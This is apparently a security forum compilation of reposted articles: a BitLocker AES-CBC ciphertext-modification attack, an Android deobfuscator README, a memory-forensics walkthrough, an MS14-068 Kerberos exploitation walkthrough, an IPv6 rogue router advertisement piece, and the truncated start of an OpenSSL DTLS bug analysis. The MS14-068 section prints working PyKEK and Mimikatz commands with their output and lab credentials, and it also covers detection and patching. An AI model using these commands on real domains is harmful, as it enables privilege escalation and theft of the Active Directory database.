Nytro

Code Execution In Spite Of BitLocker Dec 8, 2014 Disk Encryption is “a litany of difficult tradeoffs and messy compromises” as our good friend and mentor Tom Ptacek put it in his blog post. That sounds depressing, but it’s pretty accurate - trying to encrypt an entire hard drive is riddled with constraints. For example: Disk Encryption must be really, really fast. Essentially, if the crypto happens slower than the disk read speed (said another way, if the CPU is a bottleneck) - your solution is untenable to the mass market It must support random read and write access - any sector may be read at any time, and any sector may be updated at any time You really need to avoid updating multiple sectors for a single write - if power is lost during the operation, the inconsistencies will not be able to be resolved easily, if at all People expect hard disks to provide roughly the amount of advertised space. Stealing significant amounts of space for ‘overhead’ is not feasible. (This goes doubly so if encryption is applied after operating system installation - there may not be space to steal!) The last two constraints mean that the ciphertext must be the exact same size as the plaintext. There’s simply no room to store IVs, nonces, counters, or authentication tags. And without any of those things, there’s no way to provide cryptographic authentication in any of the common ways we know how to provide it. No HMACs over the sector and no room for a GCM tag (or OCB, CCM, or EAX, all of which expand the message). Which brings us to… Poor-Man’s Authentication Because of the constraints imposed by the disk format, it’s extremely difficult to find a way to correctly authenticate the ciphertext. Instead, disk encryption relies on ‘poor-man’s authentication’. The best solution is to use poor-man’s authentication: encrypt the data and trust to the fact that changes in the ciphertext do not translate to semantically sensible changes to the plaintext. For example, an attacker can change the ciphertext of an executable, but if the new plaintext is effectively random we can hope that there is a far higher chance that the changes will crash the machine or application rather than doing something the attacker wants. We are not alone in reaching the conclusion that poor-man’s authentication is the only practical solution to the authentication problem. All other disk-level encryption schemes that we are aware of either provide no authentication at all, or use poor-man’s authentication. To get the best possible poor-man’s authentication we want the BitLocker encryption algorithm to behave like a block cipher with a block size of 512–8192 bytes. This way, if the attacker changes any part of the ciphertext, all of the plaintext for that sector is modified in a random way. That excerpt comes from an excellent paper by Niels Ferguson of Microsoft in 2006 explaining how BitLocker works. The property of changing a single bit, and it propagating to many more bits, is diffusion and it’s actually a design goal of block ciphers in general. When talking about disk encryption in this post, we’re going to use diffusion to refer to how much changing a single bit (or byte) on an encrypted disk affects the resulting plaintext. BitLocker in Windows Vista & 7 When BitLocker was first introduced, it operated in AES-CBC with something called the Elephant Diffuser. The BitLocker paper is an excellent reference both on how Elephant works, and why they created it. At its heart, the goal of Elephant is to provide as much diffusion as possible, while still being highly performant. The paper also includes Microsoft’s Opinion of AES-CBC Mode used by itself. I’m going to just quote: Any time you want to encrypt data, AES-CBC is a leading candidate. In this case it is not suitable, due to the lack of diffusion in the CBC decryption operation. If the attacker introduces a change d in ciphertext block i, then plaintext block i is randomized, but plaintext block i + 1 is changed by d. In other words, the attacker can flip arbitrary bits in one block at the cost of randomizing the previous block. This can be used to attack executables. You can change the instructions at the start of a function at the cost of damaging whatever data is stored just before the function. With thousands of functions in the code, it should be relatively easy to mount an attack. The current version of BitLocker [Ed: BitLocker in Vista and Windows 7] implements an option that allows customers to use AES-CBC for the disk encryption. This option is aimed at those few customers that have formal requirements to only use government-approved encryption algorithms. Given the weakness of the poor-man’s authentication in this solution, we do not recommend using it. BitLocker in Windows 8 & 8.1 BitLocker in Windows 8 and 8.1 uses AES-CBC mode, without the diffuser, by default. It’s actually not even a choice, the option is entirely gone from the Group Policy Editor. (There is a second setting that applies to only “Windows Server 2008, Windows 7, and Windows Vista” that lets you choose Diffuser.) Even using the commandline there’s no way to encrypt a new disk using Diffuser - Manage-BDE says “The encryption methods aes128_Diffuser and aes256_Diffuser are deprecated. Valid volume encryption methods: aes128 and aes256.” However, we can confirm that the code to use Diffuser is still present - disks encrypted under Windows 7 with Diffuser continue to work fine on Windows 8.1. AES-CBC is the exact mode that Microsoft considered (quoting from above) “unsuitable” in 2006 and “recommended against”. They explicitly said “it should be relatively easy to mount an attack”. And it is. As written in the Microsoft paper, the problem comes from the fact that an attacker can modify the ciphertext and perform very fine-grained modification of the resulting plaintext. Flipping a single bit in the ciphertext results reliably scrambles the next plaintext block in an unpredictable way (the rainbow block), and flips the exact same bit in the subsequent plaintext block (the red line): This type of fine-grained control is exactly what Poor Man’s Authentication is designed to combat. We want any change in the ciphertext to result in entirely unpredictable changes in the plaintext and we want it to affect an extremely large swath of data. This level of fine-grained control allows us to perform targeted scrambling, but more usefully, targeted bitflips. But what bits do we flip? If the disk is encrypted, don’t we lack any idea of where anything interesting is stored? Yes and no. In our testing, two installations of Windows 8 onto the same format of machine put the system DLLs in identical locations. This behavior is far from guarenteed, but if we do know where a file is expected to be, perhaps through educated guesswork and installing the OS on the same physical hardware, then we will know the location, the ciphertext, and the plaintext. And at that point, we can do more than just flip bits, we can completely rewrite what will be decrypted upon startup. This lets us do much more than what people have suggested around changing a branch condition: we just write arbitrary assembly code. So we did. Below is a short video that shows booting up a Virtual Machine showing a normal unmodified BitLockered disk on Windows 8, shutting it down and modifying the ciphertext on the underlying disk, starting it back up, and achieving arbitrary code execution. This is possible because we knew the location of a specific file on the disk (and therefore the plaintext), calculated what ciphertext would be necessary to write out desired shellcode, and wrote it onto the disk. (The particular file we chose did move around during installation, so we did ‘cheat’ a little - with more time investment, we could change our target to a system dll that hasn’t been patched in Windows Updates or moved since installation.) Upon decryption, 16 bytes were garbled, but we chose the position and assembly code carefully such that the garbled blocks were always skipped over. To give credit where others have demonstrated similar work, this is actually the same type of attack that Jakob Lell demonstrated against LUKS partitions last year. XTS Mode The obvious question comes up when discussing disk encryption modes: why not use XTS, a mode specifically designed for disk encryption and standardized and blessed by NIST? XTS is used in LUKS and Truecrypt, and prevents targeted bitflipping attacks. But it’s not perfect. Let’s look at what happens when we flip a single bit in ciphertext encrypted using XTS: A single bit change completely scrambles the full 16 byte block of the ciphertext, there’s no control over the change. That’s good, right? It’s not bad, but it’s not as good as it could be. Unfortunately, XTS was not considered in the original Elephant paper (it was relatively new in 2006), so we don’t have their thoughts about it in direct comparison to Elephant. But the authors of Elephant evaluated another disk encryption mode that had the same property: LRW provides some level of poor-man’s authentication, but the relatively small block size of AES (16 bytes) still leaves a lot of freedom for an attacker. For example, there could be a configuration file (or registry entry) with a value that, when set to 0, creates a security hole in the OS. On disk the setting looks something like “enableSomeSecuritySetting=1”. If the start of the value falls on a 16-byte boundary and the attacker randomizes the plaintext value, there is a 2?16 chance that the first two bytes of the plaintext will be 0x30 0x00 which is a string that encodes the ASCII value ’0’. For BitLocker we want a block cipher whose block size is much larger. Furthermore, they elaborate upon this in their comments to NIST on XTS, explicitly calling out the small amount of diffusion. A 16-byte scramble is pretty small. It’s only 3-4 assembly instructions. To compare how XTS’ diffusion compares to Elephant’s, we modified a single bit on the disk of a BitLockered Windows 7 installation that corresponded to a file of all zeros. The resulting output shows that 512 bytes (the smallest sector size in use) were modified: This amount of diffusion is obviously much larger than 16 bytes. It’s also not perfect - a 512 byte scramble, in the right location, could very well result in a security bypass. Remember, this is all ‘Poor Man’s Authentication’ - we know the solution is not particularly strong, we’re just trying to get the best we can. But it’s still a lot harder to pop calc with. Conclusion From talking with Microsoft about this issue, one of the driving factors in this change was performance. Indeed, when BitLocker first came out and was documented, the paper spends a considerable amount of focus on evaluating algorithms based on cycles/byte. Back then, there were no AES instructions built into processors - today there are, and it has likely shifted the bulk of the workload for BitLocker onto the Diffuser. And while we think of computers as becoming more powerful since 2006 - tablets, phones, and embedded devices are not the ‘exception’ but a major target market. Using Full Disk Encryption (including BitLocker in Windows 8) is clearly better than not - as anyone’s who had a laptop stolen from a rental car knows. Ultimately, I’m extremely curious what requirements the new BitLocker design had placed on it. Disk Encryption is hard, and even XTS (standardized by NIST) has significant drawbacks. With more information about real-world design constraints, the cryptographic community can focus on developing something better than Elephant or XTS. I’d like to thank Kurtis Miller for his help with Windows shellcode, Justin Troutman for finding relevant information, Jakob Lell for beating me to it by a year, DaveG for being DaveG, and the MSRC. Sursa: https://cryptoservices.github.io/fde/2014/12/08/code-execution-in-spite-of-bitlocker.html

Simplify Generic Android Deobfuscator Simplify uses a virtual machine to understand what an app does. Then, it applies optimizations to create code that behaves identically, but is easier for a human to understand. Specifically, it takes Smali files as input and outputs a Dex file with (hopefully) identical semantics but less complicated structure. For example, if an app's strings are encrypted, Simplify will interpret the app in its own virtual machine to determine semantics. Then, it uses the apps own code to decrypt the strings and replaces the encrypted strings and the decryption method calls with the decrypted versions. It's a generic deobfuscator becuase Simplify doesn't need to know how the decryption works ahead of time. This technique also works well for eliminating different types of white noise, such as no-ops and useless arithmetic. Before / After There are three parts to the project: Smali Virtual Machine (SmaliVM) - A VM designed to handle ambiguous values and multiple possible execution paths. For example, if there is an if, and the predicate includes unknown values (user input, current time, read from a file, etc.), the VM will assume either one could happen, and takes the true and false paths. This increases uncertainty, but maintains fidelity. SmaliVM's output is a graph that represents what the app could do. It contains every possible execution path and the register and class member values at each possible execution of every instruction. Simplify - The optimizer. It takes the graphs from SmaliVM and applies optimizations like constant propagation, dead code removal, and specific peephole optimizations. Demoapp - A short and heavily commented project that shows how to get started using SmaliVM. Building There is a bug with dexlib 2.0.3 which can cause Simplify to fail often. To work around, you must: Clone and build Smali Modify this line in smalivm/build.gradle to point to the built jar, if different: compile files('../../smali/dexlib2/build/libs/dexlib2-2.0.3-dev.jar') Sorry for this step. It won't be necessary once updated dexlib is released. To build the jar, use ./gradlew shadowJar Sursa: https://github.com/CalebFenton/simplify

Analyzing Malicious Processes Posted on 2013/11/11 by jackcr Today I tweeted “Analysis techniques are individually developed. Show people processes and let them be creative”. SO I wanted to write this post to describe a method I use to analyze processes on hosts that are suspected of being compromised. When attackers gain access to your network they will need to perform certain activities in order to accomplish their goals. Very often these activities will result in executables being ran and processes started as a result. Identifying these processes is very important, but what do you do after is where you begin to earn your money. For this post I will be using a memory image from the jackcr-challenge which I created last year. If you are interested in tackling this challenge it can be downloaded from the link on the right side bar or you can follow this link https://docs.google.com/file/d/0B_xsNYzneAhEN2I5ZXpTdW9VMGM/edit. When looking at processes pay attention to the start times. We should be focusing on ones that have started around the same time frame that we are investigating (if the machine has been rebooted after the initial compromise then this method will obviously not work). Remember that attackers will very often leverage windows tools so don’t discount processes that seem like they would be non-malicious just because it was executed from a legitimate Microsoft executable. It’s also a good idea to pay attention to spawned processes as well a parent processes. If cmd.exe was spawned from iexplore.exe it may be cause for some concern. Looking at our memory image we start by inspecting the process listing. The above command will display the following output. At first glance the cmd.exe process may seem a little suspicious but is was spawned from explorer.exe and is responsible for mdd.exe which collected the memory dump. The PSEXECSVC.exe process looks a little suspicious though. When psexec.exe is executed on a client machine it will copy the psexecsvc.exe binary over a smb connection to the destination and start a service as well as create a named pipe in which commands will be executed over. This may very well be an admin performing maintenance on the server, but not knowing for sure warrants investigation. The first thing I will want to look at are the ip’s that have been communicating to this machine on ports 135 and 445 since I know psexec communicates over these. As these connections may not be established any longer I will use the Volatility plugin, connscan, which has the ability to locate closed tcp connections as it scans for _TCPT_OBJECTS which may still reside in memory. Based on the output we have 3 machines that we may need to validate and possibly investigate after performing analysis on this machine. We will also use these ip’s when analyzing the process strings. Before looking at the strings I want to look at the open handles to the process as it may give some clues to additional items that may need to be investigated. At this point I mainly want to look at open file handles. The above command will produce the following output. We can see the named pipe created by the execution of psexec on the client machine, but not really anything else that would steer my investigation. The output can be large so I initially like to start with a smaller subset that I think may give some results I’m looking for. At this point I will broaden my search to see if I can find anything else of interest. We can see in the below output that we have a hostname that’s tied to this process. If this turns out to be a malicious process we will need to immediately contain that host to prevent further lateral movement and investigate for additional compromises. As processes start, the operating system will allocate up to 2GB of virtual address space for that process to execute in. I like to think of processes as a container of activity. If I specifically look at that container I should see activity that is directly related to the activity I’m looking for. This is important because when looking at memory strings it’s very easy to to find things that look really bad only to find out that they are part of an AV signature or part of a legitimate connection. It is also much easier to analyze a small section of memory than the entire memory dump. Using the volatility plugin memdump we can dump the entire contents of a process into a binary file. We should create a strings file with both ascii and unicode strings as it’s much faster to grep through ans ascii file than a binary file. By default I like to prepend each string with the byte offset incase I need to locate that string in the dump file. We can use the following 2 commands to produce this file. Very often when attackers want to execute commands on compromised machines they will create batch scripts to perform these tasks. Just searching the strings file for “echo off” we are able to, not only confirm that this host is compromised, but gain insight into what happened on this machine as well as identify indicators to look for on our network. The 3 batch scripts identified performed the following actions: 1. Rar’d up the contents of C:\Engineering\Designs\Pumps 2. Created a scheduled task to copy wc.exe to the system32 directory and execute it at 04:30 3. Collected system information and directed the output to the file system.dll Searching the process data for the ip’s I was able to locate these log files in memory indicating a login to this machine using the sysbackup account which was the same username identified in the batch script. The host that initiated the login was also the host identified in the handles output. Knowing that this machine is confirmed compromised there are some additional actions we must take in hopes of limiting the scope of the incident. 1. Search network for any directories named webui in the system32 directory 2. Attempt to locate wc.exe in memory or on the host itself to determine capabilities (typicaly locating in memory would be much faster then collecting on the host). 3. Collect and analyze data from 3 ip’s seen making port 445 connections 4. Search network for presence of wc.exe, ra.exe, system.dll 5. Search logs for 540 / 4624 type 3 logon attempts from suspicious ip’s as well as machines using the sysbackup account. 6. Change the sysbackup credentials as well as all user credentials on the compromised machines (domain and local) 7. Determine what files were rar’d 8. Look for possible data exfil in network traffic There is a lot of additional data in these memory images and I encourage you to have a look at them if you’ve not already done so. Again I hope this helps somebody out there and let me know if you have any questions or comments. Sursa: Analyzing Malicious Processes

Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) by Sean Metcalf MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monné posted to GitHub a few days ago. I configured a Windows 7 workstation with Python 2.7.8 and downloaded the PyKEK zip as well as the Mimikatz zip file. The MS14-068.py Python script (part of PyKEK) can be run on any computer that has connectivity to the target Domain Controller. I ran PyKEK against a Windows Server 2008 R2 Domain Controller not patched for MS14-068 using Kali Linux as well as a domain-joined Windows 7 workstation. Interesting side note: I also stood up one Windows Server 2012 and one Windows Server 2012 R2 Domain Controller in the same site as the two unpatched Windows Server 2008 R2 DCs. None of the Domain Controllers in my lab.adsecurity.org AD Forest are patched for MS14-068. After successfully running the PyKEK script to generate the TGT, I was unable to get a TGS successfully to exploit the 2008 R2 DC. After shutting down the 2012 & 2012R2 DCs, I could use the forged TGT to get a TGS and access the targeted 2008 R2 DC (ADSDC02). I will be looking into this more later this week. 12/8 Update: I added a Mitigation section at the end of the post as well as events from a patched Domain Controller when attempting to exploit (in the events section). Staging the Attack: The targeted user account in this post is “Darth Sidious” (darthsidious@lab.adsecurity.org). Note that this user is a member of Domain Users and a Workstation group. This group membership stays the same throughout the activity in this post (I took the screenshot after exploiting the DC). Assume that this user is an authorized user on the network and wants to get Domain Admin rights to perform nefarious actions. The user already has a valid domain account and knows the password for the domain. This is no different from an attacker spearphishing this user and stealing their credentials as they get local admin rights on the computer. Once the attacker has valid domain credentials and local admin rights on a computer on the network, they can leverage PyKEK to generate a forged TGT by performing standard communication with the target (unpatched) DC. The PyKEK ms14-068.py Python script needs some information to successfully generate a forged TGT: User Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org User Password [-p]: TheEmperor99! User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-222232912 7-1110 Targeted Domain Controller [-d]: adsdc02.lab.adsecurity.org The SID can be found by running the “whoami” command while logged in as the target user. You can also get this information from PowerShell by running : [security.Principal.WindowsIdentity]::GetCurrent( ) As I noted in my previous post on PyKEK, the following group membership is included in the forged TGT: Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) Phase 1: Forging a TGT: Here’s a screenshot of the exploit working in Kali Linux (1.09a) After generating the ccache file containing the forged and validated TGT Kerberos ticket, the ccache file can be copied to a Windows computer to run Mimikatz. It works well on Windows running Python as well (command is in bold & italics). c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912 7-1110 -d adsdc02.lab.adsecurity.org [+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done! [+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done! [+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done! [+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done! [+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done! [+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done! [+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done! [+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done! [+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done! Here’s the screenshot of the ms14-068 exploit working on Windows. I ran WireShark on the targeted Domain Controller. Here’s the pcap (zipped) of the network traffic from the PyKEK ms14-068.py script: ADSecurityOrg-MS14068-Exploit-KRBPackets Note that I have generated a forged TGT with a single, stolen domain account. The next step is to use this forged TGT, so I logon to a computer as the local admin account with network access to the targeted Domain Controller. Whoami shows I am logged on as admin on the computer ADSWKWIN7. Klist shows there are no Kerberos tickets in memory for this user (there wouldn’t be, this is a local admin account). The PyKEK ms14-068.py Python script saves the forged TGT to a ccache file (TGT_darthsidious@lab.adsecurity.org.ccache) in the current working directory (c:\temp\pykek shown above) Phase 2: Injecting the forged TGT and gaining a valid TGS: After the forged Kerberos TGT ticket is generated, it’s time to inject it into the current user session using Mimikatz (command is in bold & italics). c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit .#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ‘## v ##’ mimikatz | Blog de Gentil Kiwi (oe.eo) ‘#####’ with 15 modules * * */ mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG Data 0 Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 – rc4_hmac_nt af5e7b47316c4cebae0a7ead04059799 Ticket : 0x00000000 – null ; kvno = 2 […] * Injecting ticket : OK mimikatz(commandline) # exit Bye! Note that since I am injecting the forged TGT which states that I am a member of Domain Admins, Enterprise Admins, etc into my session, when this TGT is passed to an unpatched DC for a Kerberos service ticket (TGS), the service ticket will show I am a member of these groups. When the TGS is presented to a service, the user account is treated as if it is a member of these groups, though viewing the group membership shows the user is conspicuously absent. This enables an attacker to act as if they are a member of groups when they are not. I ran WireShark on the targeted Domain Controller. Here’s the pcap (zipped) of the network traffic using the forged TGT ticket via Mimikatz and connecting to the Domain Controller’s Admin$ share: ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access Once I have successfully injected the forged TGT into my session (remember, I am logged onto a domain-joined Windows 7 computer as the local admin – not with AD domain credentials), I leverage this to connect to the Domain Controller and gain access to the Active Directory database (ntds.dit). Domain Controller Event Logs from the Attack: Here are the event logs on the targeted Domain Controller when using the forged TGT to get a TGS in order to access the Domain Controller’s admin$ share and locate the AD database files: Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT. Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT. Event 4624 shows darthsidious@lab.adsecurity.org using the TGS service ticket to logon to the target Domain Controller. Event 5140 shows darthsidious@lab.adsecurity.org using the TGS service ticket to connect to the target Domain Controller’s Admin$ share (net use \\adsdc02.lab.adsecurity.org\admin$) which only an administrator has access. Event 4672 shows darthsidious@lab.adsecurity.org successfully authenticated (and logged on to) the target Domain Controller which only an administrator has access. Note that this user has SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnership, etc showing the user has full Admin access to this computer. It’s Game Over at this point. Here’s what it looks like when a client attempts to use a forged TGT to get a Kerberos service ticket (TGS) when communicating with a patched DC: Event 4769 shows darthsidious@lab.adsecurity.org attempting to get a Kerberos service ticket (TGS) for a CIFS (SMB) share on the Domain Controller (adsdc01.lab.adsecurity.org). The TGS fails because the DC (adsdc01.lab.adsecurity.org) is patched an logs this failure in the security event log as a failed 4769 event. . NOTE: This is the event Microsoft recommends you monitor closely after applying KB3011780 (the MS14-068 patch). Event 4776 shows an audit failure for the computer and the username logged into the computer. This event is associated with the 4769 event above. Since I was logged on as the local administrator account “admin” it shows in the log. This is a red flag. However, I could have created a local admin account on the box with the same name as a Domain Admin in the domain and it may not be scrutinized as much. Check your logs! Note: There should only be minor differences in performing any of these actions from a non-domain joined computer. This concludes the lesson on how to own an Active Directory forest in less than 5 minutes with only a user account and a connected Windows computer (and associated admin account). Mitigations: Patch all Domain Controllers with KB3011780 in every AD domain. I uploaded a sample script for getting KB3011780 patch status for all Domain Controllers: Get-DCPatchStatus (change file extension to .ps1) [UnPatched DCs] Monitor event ID 4672 for users who are not members of domain-level admin groups (default groups able to logon to Domain Controllers – this is why you shouldn’t use these default, built-in groups for delegation of administration): Enterprise Admins (admin on all DCs in the forest), Domain Admins Administrators Server Admins Backup Operators Account Operators Print Operators Other groups delegated in your environment to logon to Domain Controllers [Patched DCs], monitor event id 4769 Kerberos Service Ticket Operation event which shows failed attempts to get Kerberos service tickets (TGS). References: MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK) Mimikatz and Active Directory Kerberos Attacks MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum Kerberos Vulnerability in MS14-068 Explained MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege The Python script MS14-068 POC code: Python Kerberos Exploitation Kit (PyKEK) Benjamin Delpy’s blog (Google Translate English translated version) Mimikatz GitHub repository Mimikatz Github wiki Mimikatz 2 Presentation Slides (Benjamin Delpy, July 2014) All Mimikatz Presentation resources on blog.gentilkiwi.com Sursa: Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)

Why You Must Use ICMPv6 Router Advertisements (RAs) Posted on June 16, 2014 - 05:14:52 PM by Scott Hogg When a dual-protocol host joins a network it sends an ICMPv6 (type 133) Router Solicitation (RS) message to inquire about the local IPv6-capable router on the network. The local router is tuned into the ff02::2 (all-router’s multicast group address) and will receive the RS message. In response to the RS, the router immediately sends an ICMPv6 (type 134) Routing Advertisement (RA) message to the all nodes on the network (ff02::1, the all nodes multicast group address). The router also sends the RA messages periodically (typically every 200 seconds) to keep the nodes informed of any changes to the addressing information for the LAN. The RA message contains important information for nodes as well as which method they should use to obtain their IPv6 address. The RA contains several flags that are set that the nodes watch for and use. A-bit – Autonomous Address Autoconfiguration Flag tells the node it should perform stateless address assignment (SLAAC RFC 4862) L-bit – On-Link Flag tells the node that the prefix listed in the RA is the local IPv6 address M-bit – Managed Address Config Flag tells the host if it should use stateful DHCPv6 (RFC 3315) to acquire its address and other DHCPv6 options O-bit – Other Config Flag tells the host that there is other information the router can provide (such as DNS information defined in Stateless DHCPv6 (RFC 3736)) ICMPv6 RAs are intended to help facilitate bootstrapping the connectivity of an IPv6 node on a network. They tell the hosts on the LAN how they should go about acquiring their global unicast IPv6 address and become productive members of the network. The RA also provides the end-node information about the local router and its ability to be the default gateway. This process is well documented in Section 4 of the IETF RFC 4861 “Neighbor Discovery for IP version 6 (IPv6)”. Unfortunately, there are some security risks related to ICMPv6 RA messages. On networks that do not yet use IPv6, the dual-stack hosts sit dormant waiting for an eventual RA message to awaken their IPv6 connectivity. An attacker can craft a “rogue RA” message on these networks, get the dual-protocol nodes on the network to configure their IPv6 addresses and utilize the attacker’s system as their default gateway. The attacker can then easily perform a Man-In-The-Middle (MITM) attack without the user’s knowledge using this technique. This issue is documented in RFC 6104 “Rogue IPv6 Router Advertisement Problem Statement”. On networks that already have IPv6 running, rogue RAs can destabilize the network (and still perform a MITM attack). Rogue RA messages can be easily generated with The Hacker’s Choice IPv6 Attack Toolkit, Scapy, SI6 Networks IPv6 Toolkit, Nmap, and Evil FOCA, among other tools and methods. There are methods to detect and block these rogue RA messages. Utilities like NDPMon, Ramond, 6MoN, and others can be used to look for suspicious Neighbor Discovery Protocol (NDP) packets and detect invalid RA messages. These tools function much like the old ARPWATCH program did for detecting ARP attacks on an IPv4 LAN. There is a technique called “RA Guard” that can be implemented in an Ethernet switch to permit legitimate RAs from a valid router and block the malicious rogue RA messages. This technique is documented in IETF RFC 6105 “IPv6 Router Advertisement Guard”. There is also a very new RFC 7113 “Implementation Advice for IPv6 Router Advertisement Guard (RA-Guard)”. A good example of improved first hop security (FHS) in IPv6 can be implemented in Cisco switches. Unfortunately, there are also methods to avoid any rogue RA detection accomplished by NDP security methods. Finding the ICMPv6 layer-4 header information could be made difficult by forcing the system to fully parse the IPv6 header structure. An attacker can change the location of the RA in the IPv6 packet by using extension headers to avoid detection especially if security tools do not parse the entire RA message. If an end-node receives an RA with a hop-by-hop extension header or an atomic fragment, the host disregards the header but still processes the RA normally. This rogue RA attack is called “RA guard evasion”. Legitimate RA messages should not include fragmentation or other headers. There is some additional guidance along these lines documented in RFC 6980 “Security Implications of IPv6 Fragmentation with IPv6 Neighbor Discovery”. There are other beneficial uses of ICMPv6 RA messages on a LAN. Another method of getting DNS information to IPv6 nodes is to leverage options within the RA to send the DNS server and domain search list. Nodes that receive the RA can simply parse these options and get this DNS information and use it with their SLAAC auto-generated IPv6 addresses. IETF RFC 6106 "IPv6 Router Advertisement Options for DNS Configuration" defines the Recursive DNS Server (RDNSS) and DNS Search List (DNSSL) options within Router Advertisement (RA). One of the challenges with RDNSS is getting support for it natively in the host operating systems. This link provides some information on which OSs support this option. There is also a RDNSS deamon for Linux (rdnssd). Even if you intend to use DHCPv6 instead of SLAAC in your environment, you still need RA messages to function on the local LAN. The RAs provide the default gateway information to an end node and, with the M-bit, inform the nodes that the LAN uses stateful DHCPv6. DHCPv6 does not currently have an option to provide this information to the DHCPv6 client in the same way it is provided with DHCP for IPv4. Providing the default gateway as a DHCPv6 option was proposed, but never made it into the standards. DHCPv6 may be desirable in the desktop access portions of an enterprise network and DHCPv6 is absolutely essential in the service provider’s subscriber access networks. However, organizations may not need DHCPv6 in a data center environment. Most organizations will prefer to statically configure IPv6 address parameters on specific systems in the network environment. Static address configuration may be preferred for systems that need to have a fixed, non-changing IPv6 address or for nodes that are unable to perform dynamic address assignment. The systems in the networks that will most likely use this static IPv6 addressing technique are servers and systems within data center environments. These servers could be on an internally-accessible networks, private/hybrid cloud infrastructures, or Internet publically-accessible network. Any system that is going to have its address used in some form of firewall policy or access-control list will need a static address. Servers within a data center environment would need to be configured with the following information to be able to operate correctly in an IPv6 environment Static IPv6 address for its network interface This address would be allocated from the IPAM system and registered within the DNS system with an AAAA resource record and an accompanying PTR record. Static IPv6 default gateway This could either be a global unicast address of the first-hop router or the Link-Local address of the first-hop router (e.g. FE80::1). Static DNS server This is the caching DNS resolver this system will use when it needs to perform DNS queries (e.g. configured within the /etc/resolv.conf) DNS Domain Name This is the domain name that the system will use in combination with the server's hostname to create its fully-qualified domain name (FQDN) (e.g. the domain suffix search order list) Typically, servers will have a static IPv6 address assigned, But they will still use the information contained in the ICMPv6 (type 134) Router Advertisement (RA) message sent by the first-hop router to learn information about the default gateway. RA messages contain the link-local address and the layer-2 (MAC) address of the first-hop router. Servers can listen to these and use this information to auto-configure their default gateway. If you want to disable sending of RA messages on a Cisco IOS router, you can use the following commands to accomplish this goal. interface GigabitEthernet 0/12 ipv6 address 2001: db8:1234:5678::1/64 ipv6 nd prefix no-autoconfig ipv6 nd suppress-ra ipv6 nd ra suppress all It is important to realize how important the ICMPv6 RA message is to the function of an IPv6-enabled LAN. Security risks exist, but the attacker must be on-net or have compromised a node on the network to be able to perform these rogue RA MITM attacks. Most enterprise organizations would prefer DHCPv6 for desktop LANs, but RAs are still needed on these networks. In a data center, an organization may want to statically assign the address details to hosts and not use RA messages. Regardless, people should not fear the RAs and learn to embrace them. Sursa: https://community.infoblox.com/blogs/2014/06/16/why-you-must-use-icmpv6-router-advertisements-ras

CVE-2014-0195: Adventures in OpenSSL’s DTLS Fragmented Land By Mark Yason December 8, 2014 Earlier this year, details of a remote code execution bug in OpenSSL’s DTLS implementation were published. The following is a look at the bug, its process and the different ways attackers might leverage it for exploitation: Vulnerability On a high level, the bug allows writing past the end of a buffer allocated in the heap, allowing application data or heap metadata to be overwritten. This leads to application crashes or remote code executions, at worst. The bug is due to the way the OpenSSL DTLS parser handles fragmented handshakes. Specifically, it uses the message length specified in the initial fragment for the message buffer allocation, but it uses the message length specified in subsequent fragments to determine whether they are within range of the message. Consider the following fragmented ClientHello message that triggers the bug: When the initial ClientHello fragment is encountered, the parser will allocate a message buffer based on the specified message length (2, in this case). Next, the fragment data “A” (fragment offset = 0, fragment length = 1) is written to the message buffer: Then, when the second ClientHello fragment is parsed, the fragment offset and fragment length is checked to determine whether they are within the range of the message length: Notice that the check uses the message length specified in the current fragment being parsed (msg_hdr->msg_len) and not the message length specified in the initial fragment. Therefore, the check will pass, causing the fragment data “B” (fragment offset = 2, fragment length = 1) to be written past the end of the allocated message buffer: As you may have observed, the bug is interesting in that an attacker has a relatively high control of where (fragment offset), what (fragment data) and how much data (fragment length) can be written. Triggering Now that we have an idea of what the bug is, let’s try to trigger it. For testing, an Ubuntu 14.04 x64 test VM is used. The libssl1.0.0 library is 